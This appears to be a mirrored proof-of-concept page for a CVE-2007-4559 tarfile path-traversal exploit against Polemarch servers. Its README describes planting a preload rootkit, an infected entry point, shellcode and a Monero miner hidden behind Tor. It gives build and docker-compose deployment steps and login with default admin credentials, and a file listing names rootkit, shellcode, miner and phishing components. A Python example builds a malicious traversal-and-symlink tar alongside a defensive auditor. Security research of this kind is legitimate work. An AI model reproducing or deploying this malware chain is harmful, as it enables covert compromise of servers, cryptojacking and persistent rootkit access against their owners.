Related vulnerability
Title:
Python tarfile module path traversal vulnerability
(CVE-2007-4559)
Description: Python is an open-source, object-oriented programming language maintained by the Python Software Foundation; it is extensible, supports modules and packages, and runs on many platforms. The (1) extract and (2) extractall functions of Python's tarfile module contain a directory traversal vulnerability that allows user-assisted remote attackers to overwrite arbitrary files via a .. (dot dot) sequence in a filename inside a TAR archive. The issue is related to CVE-2001-1267.
Description
CVE-2007-4559 - Polemarch exploit
Introduction
# CVE-2007-4559 - Polemarch exploit
Full working exploit for the Polemarch server https://www.polemarch.org/, using CVE-2007-4559, allowing:
- Injection of a Monero cryptominer that routes its traffic through Tor to stay hidden.
- Injection of a rootkit that hooks the most common sysadmin tools.
## POC
Proof of concept using https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4559
and based on the work from https://www.trellix.com/en-us/about/newsroom/stories/research/tarfile-exploiting-the-world.html.
### Directories to attack
We want to be able to drop the following files into a Polemarch server:
- /usr/local/lib
  - **rootkit.so**: shared library that does the preloading
- /etc
  - **ld.so.preload**: dynamic loader configuration file that forces rootkit.so into every process
- /opt/polemarch/bin
  - **polemarchctl**: infected Docker entry point
- /usr/bin
  - **xmrig**: miner
  - **tor**: Tor
  - **shellcode**: obfuscated shellcode responsible for starting the miner and Tor

Note: in a real exploit we would change some of these names to avoid detection.
### Notes
- Binary files MUST carry executable permissions inside the tar (tarfile preserves the stored mode).
- A given tar cannot be deployed twice.
- The malware is placed in an auxiliary folder inside the archive that is really a symlink to the target directory; tarfile creates the link first and then writes the following members through it.
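The two tricks listed above (a `..` sequence in a member name, and an auxiliary folder that is a symlink into the target directory) are easy to reproduce and to catch before extraction. The following Python is an added example, not the project's own `tar.py`: it builds a small constructed tar.gz that carries both tricks, and an `audit_tar` function that reports every member which would land outside the extraction directory, including members whose path passes through a symlink created earlier in the archive. Paths such as `/opt/polemarch/projects/demo` are assumed for illustration.

```python
import io
import os
import posixpath
import tarfile


def _add_file(tar, name, data, mode=0o755):
    """Append a regular file member from bytes (no filesystem access)."""
    info = tarfile.TarInfo(name)
    info.size = len(data)
    info.mode = mode  # executable by default, as the README requires for binaries
    tar.addfile(info, io.BytesIO(data))


def _add_symlink(tar, name, target):
    """Append a symbolic link member pointing at `target`."""
    info = tarfile.TarInfo(name)
    info.type = tarfile.SYMTYPE
    info.linkname = target
    tar.addfile(info)


def build_malicious_tar():
    """Constructed sample: a project tar.gz carrying both tricks described above."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        _add_file(tar, "project/README.md", b"benign looking project\n", mode=0o644)
        # Trick 1: the dot-dot traversal that is CVE-2007-4559 itself.
        _add_file(tar, "../../../../etc/ld.so.preload",
                  b"/usr/local/lib/rootkit.so\n", mode=0o644)
        # Trick 2: an "auxiliary folder" that is a symlink to the target
        # directory; members added after it are written through the link.
        _add_symlink(tar, "project/aux", "/usr/local/lib")
        _add_file(tar, "project/aux/rootkit.so", b"\x7fELF placeholder bytes")
    return buf.getvalue()


def build_benign_tar():
    """Constructed sample: an ordinary project archive with nothing to flag."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        _add_file(tar, "project/README.md", b"hello\n", mode=0o644)
        _add_file(tar, "project/playbooks/ping.yml", b"- hosts: all\n", mode=0o644)
    return buf.getvalue()


def _escapes(dest, path):
    """True if absolute `path` lies outside absolute `dest`."""
    return os.path.commonpath([dest, path]) != dest


def audit_tar(tar_bytes, dest="/opt/polemarch/projects/demo"):
    """Return [(member name, reason)] for every member that would land outside dest."""
    dest = os.path.abspath(dest)
    findings = []
    links = {}  # archive path of a symlink -> absolute location it resolves to
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        for m in tar.getmembers():
            name = posixpath.normpath(m.name)
            if name.startswith("/"):
                findings.append((m.name, "absolute path"))
                continue
            real = os.path.normpath(os.path.join(dest, name))
            if _escapes(dest, real):
                findings.append((m.name, "dot-dot traversal"))
                continue
            # Re-route the path through any symlink created earlier in the archive.
            parts = name.split("/")
            for i in range(1, len(parts)):
                prefix = "/".join(parts[:i])
                if prefix in links:
                    real = os.path.normpath(os.path.join(links[prefix], *parts[i:]))
                    break
            if _escapes(dest, real):
                findings.append((m.name, "path goes through escaping symlink"))
                continue
            if m.issym():
                if m.linkname.startswith("/"):
                    target = os.path.normpath(m.linkname)
                else:
                    target = os.path.normpath(
                        os.path.join(dest, posixpath.dirname(name), m.linkname))
                links[name] = target
                if _escapes(dest, target):
                    findings.append((m.name, "symlink target escapes"))
    return findings


def safe_extract(tar_bytes, dest):
    """Refuse the whole archive on any finding; otherwise extract with the data filter
    where the interpreter provides one (Python 3.12 and the backported releases)."""
    bad = audit_tar(tar_bytes, dest)
    if bad:
        raise ValueError(f"refusing to extract: {bad}")
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        if hasattr(tarfile, "data_filter"):
            tar.extractall(dest, filter="data")
        else:
            tar.extractall(dest)
```

Run against `build_malicious_tar()` the audit flags the `ld.so.preload` member, the `project/aux` link whose target is `/usr/local/lib`, and `project/aux/rootkit.so`, which would be written into `/usr/local/lib` through that link; the benign archive produces no findings. A plain `..` check alone would miss the last two, which is why the audit tracks symlinks in archive order.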
## Instructions
In order to deploy the malware we have to go through the following steps:
- Compile the necessary binaries
- Set up the Polemarch server and the malicious server hosting the infected tar
- Upload the infected tar to the Polemarch server
## Compile binaries
We need to compile the rootkit shared library and the shellcode:
```bash
# rootkit shared library (run inside rootkit/, which carries the Makefile)
make
# 32-bit shellcode with an executable stack (run inside shellcode/)
gcc -z execstack -m32 -o shellcode shell.c
```
## Polemarch server and malicious server
We have created a docker-compose setup which will:
- Set up a vulnerable Polemarch server at http://localhost:8080
- Generate an infected tar with all the necessary files
- Set up an auxiliary Python server hosting the malicious tar at http://energyplus.com/project.tar.gz (only reachable from inside the Docker network)
```bash
docker compose build
docker compose up -d
```
## Upload infected tar
Log in to the Polemarch server with the default credentials (admin/admin) and
create a project from the compromised tar file:

Now, the next time the container is `restarted`, the miner and Tor will be executed inside the Polemarch server.
## Disclaimer
This project is for research purposes only and should not be used for any illegal or malicious activities. The creators of this project are not responsible for any harm or damage caused by the misuse of this software.
File snapshot
[4.0K] /data/pocs/c8ff4f53d44d564ed80ab55fbf1c5021b3faa263
├── [4.0K] cryptominer
│ ├── [ 522] config.json.default
│ ├── [2.2K] README.md
│ ├── [ 141] SHA256SUMS
│ ├── [ 21M] tor
│ └── [6.7M] xmrig
├── [ 357] docker-compose.yml
├── [1.2K] Dockerfile
├── [4.0K] docs
│ └── [ 13K] DOCS.md
├── [4.0K] phishing
│ ├── [4.0K] Energy_Plus_Test
│ │ ├── [ 317] ifconfig.yml
│ │ ├── [ 61] ping.yml
│ │ ├── [ 438] prepare_nodes.yml
│ │ ├── [ 445] README.md
│ │ └── [ 366] update.yml
│ └── [1.3K] README.md
├── [4.0K] poc
│ ├── [ 25] ld.so.preload
│ ├── [ 545] polemarchctl
│ ├── [ 456] README.md
│ ├── [ 162] shellcode.py
│ ├── [4.0K] tar
│ └── [2.6K] tar.py
├── [1.3K] provision-docker.sh
├── [2.6K] provision-vagrant.sh
├── [2.6K] README.md
├── [4.0K] rootkit
│ ├── [ 128] Makefile
│ └── [ 15K] rootkit.c
├── [4.0K] shellcode
│ ├── [ 525] README.md
│ └── [2.1K] shell.c
├── [1.8K] STORY.md
└── [2.9K] Vagrantfile
8 directories, 28 files
Notes
1. Prefer accessing the POC through its original source.
2. If the source is gone or unreachable, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.